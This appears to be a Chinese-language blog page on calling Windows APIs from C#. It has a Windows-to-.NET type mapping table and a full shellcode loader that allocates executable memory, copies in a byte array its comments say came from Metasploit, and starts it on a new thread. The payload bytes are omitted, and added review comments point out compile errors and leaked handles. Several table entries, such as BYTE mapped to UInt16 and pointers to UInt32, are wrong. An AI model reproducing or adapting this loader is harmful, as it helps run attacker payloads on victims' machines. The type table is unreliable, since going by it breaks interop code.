看点代码安抚浮躁的心
Windows API 数据类型 | 调用 Windows API 时使用的 .NET 数据类型 |
---|---|
BOOL | System.Int32 |
BOOLEAN | System.Int32 |
BYTE | System.UInt16 |
COLORREF | System.UInt32 |
DWORD | System.UInt32 |
DWORD32 | System.UInt32 |
DWORD64 | System.UInt64 |
FLOAT | System.Single |
HACCEL | System.IntPtr |
HANDLE | System.IntPtr |
HBITMAP | System.IntPtr |
HBRUSH | System.IntPtr |
HCONV | System.IntPtr |
HCONVLIST | System.IntPtr |
HCURSOR | System.IntPtr |
HDC | System.IntPtr |
HDDEDATA | System.IntPtr |
HDESK | System.IntPtr |
HDROP | System.IntPtr |
HDWP | System.IntPtr |
HENHMETAFILE | System.IntPtr |
HFILE | System.IntPtr |
HFONT | System.IntPtr |
HGDIOBJ | System.IntPtr |
HGLOBAL | System.IntPtr |
HHOOK | System.IntPtr |
HICON | System.IntPtr |
HIMAGELIST | System.IntPtr |
HIMC | System.IntPtr |
HINSTANCE | System.IntPtr |
HKEY | System.IntPtr |
HLOCAL | System.IntPtr |
HMENU | System.IntPtr |
HMETAFILE | System.IntPtr |
HMODULE | System.IntPtr |
HMONITOR | System.IntPtr |
HPALETTE | System.IntPtr |
HPEN | System.IntPtr |
HRGN | System.IntPtr |
HRSRC | System.IntPtr |
HSZ | System.IntPtr |
HWINSTA | System.IntPtr |
HWND | System.IntPtr |
INT | System.Int32 |
INT32 | System.Int32 |
INT64 | System.Int64 |
LONG | System.Int32 |
LONG32 | System.Int32 |
LONG64 | System.Int64 |
LONGLONG | System.Int64 |
LPARAM | System.IntPtr |
LPBOOL | System.Int16[] |
LPBYTE | System.UInt16[] |
LPCOLORREF | System.UInt32[] |
LPCSTR | System.String |
LPCTSTR | System.String |
LPCVOID | System.UInt32 |
LPCWSTR | System.String |
LPDWORD | System.UInt32[] |
LPHANDLE | System.UInt32 |
LPINT | System.Int32[] |
LPLONG | System.Int32[] |
LPSTR | System.String |
LPTSTR | System.String |
LPVOID | System.UInt32 |
LPWORD | System.Int32[] |
LPWSTR | System.String |
LRESULT | System.IntPtr |
PBOOL | System.Int16[] |
PBOOLEAN | System.Int16[] |
PBYTE | System.UInt16[] |
PCHAR | System.Char[] |
PCSTR | System.String |
PCTSTR | System.String |
PCWCH | System.UInt32 |
PCWSTR | System.UInt32 |
PDWORD | System.Int32[] |
PFLOAT | System.Single[] |
PHANDLE | System.UInt32 |
PHKEY | System.UInt32 |
PINT | System.Int32[] |
PLCID | System.UInt32 |
PLONG | System.Int32[] |
PLUID | System.UInt32 |
PSHORT | System.Int16[] |
PSTR | System.String |
PTBYTE | System.Char[] |
PTCHAR | System.Char[] |
PTSTR | System.String |
PUCHAR | System.Char[] |
PUINT | System.UInt32[] |
PULONG | System.UInt32[] |
PUSHORT | System.UInt16[] |
PVOID | System.UInt32 |
PWCHAR | System.Char[] |
PWORD | System.Int16[] |
PWSTR | System.String |
REGSAM | System.UInt32 |
SC_HANDLE | System.IntPtr |
SC_LOCK | System.IntPtr |
SHORT | System.Int16 |
SIZE_T | System.UInt32 |
SSIZE_T | System.UInt32 |
TBYTE | System.Char |
TCHAR | System.Char |
UCHAR | System.Byte |
UINT | System.UInt32 |
UINT32 | System.UInt32 |
UINT64 | System.UInt64 |
ULONG | System.UInt32 |
ULONG32 | System.UInt32 |
ULONG64 | System.UInt64 |
ULONGLONG | System.UInt64 |
USHORT | System.UInt16 |
WORD | System.UInt16 |
WPARAM | System.IntPtr |
LPTHREAD_START_ROUTINE | UInt32 |
LPSECURITY_ATTRIBUTES | LPSECURITY_ATTRIBUTES |
// Declaration form used in the page's first example: bind VirtualAlloc from kernel32.dll by entry-point name.
[DllImport("kernel32", EntryPoint = "VirtualAlloc")] // import the VirtualAlloc function from kernel32.dll
// `uint` and `UInt32` are the same type; the mix on this line is cosmetic.
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);// declare the Win32 API function
...
// Call site: 0x00001000 is MEM_COMMIT and 0x40 is PAGE_EXECUTE_READWRITE.
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);
// Or, equivalently, with the two flags as named fields.
// (Snippet only: in the full listing the fields sit at class level and the call inside Main.)
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
extern 修饰符用于声明在外部实现的方法。extern 修饰符的常见用法是在使用 Interop 服务调入非托管代码时与 DllImport 特性一起使用。在这种情况下，还必须将方法声明为 static。
完整代码
// Entry point of the page's full listing. Sequence: allocate a committed
// read/write/execute region, copy the byte array into it, start a thread at
// that address, then block until the thread exits.
static void Main(string[] args)
{
// native function’s compiled code
// generated with metasploit
// NOTE(review): `new byte[892] { }` does not compile as written — C# requires
// the initializer length to match the declared size (the page elides the bytes).
byte[] shellcode = new byte[892] { };
// Apparently earlier drafts of the two calls, left commented out by the author.
//UInt32 funcAddr= VirtualAlloc(0, (uint)shellcode.Length,);
//CreateThread(0,0, funcAddr,);
// lpStartAddr = 0 lets the system pick the address; MEM_COMMIT (0x1000) and
// PAGE_EXECUTE_READWRITE (0x40) are the fields declared after Main.
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copy the managed array into the unmanaged region; funcAddr is widened
// from UInt32 to IntPtr for Marshal.Copy.
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
// No parameter is handed to the thread (IntPtr.Zero).
IntPtr pinfo = IntPtr.Zero;
// execute native code
// Thread attributes 0, default stack size (0), creation flags 0 (start
// immediately); threadId receives the new thread's id by ref.
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
// 0xFFFFFFFF is INFINITE: wait until the thread terminates.
WaitForSingleObject(hThread, 0xFFFFFFFF);
// NOTE(review): hThread is never passed to CloseHandle and the region is never
// released with VirtualFree, although both functions are declared below.
}
// Allocation flags used by Main (values as in the Win32 headers).
// NOTE(review): neither field is reassigned anywhere visible; `const` would state that.
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
// P/Invoke declarations. Main calls only VirtualAlloc, CreateThread and
// WaitForSingleObject; the rest are declared but unused in this listing.
// No CharSet is given, so DllImport's Ansi default applies and the string
// parameters bind to the "A" entry points.
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
// Declared but not called from Main (the allocated region is never released).
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
// Declared but not called from Main (hThread is never closed).
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
// NOTE(review): calling GetLastError through P/Invoke is unreliable because the
// runtime may overwrite the last-error value in between; the documented pattern
// is SetLastError = true on the DllImport plus Marshal.GetLastWin32Error().
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}
}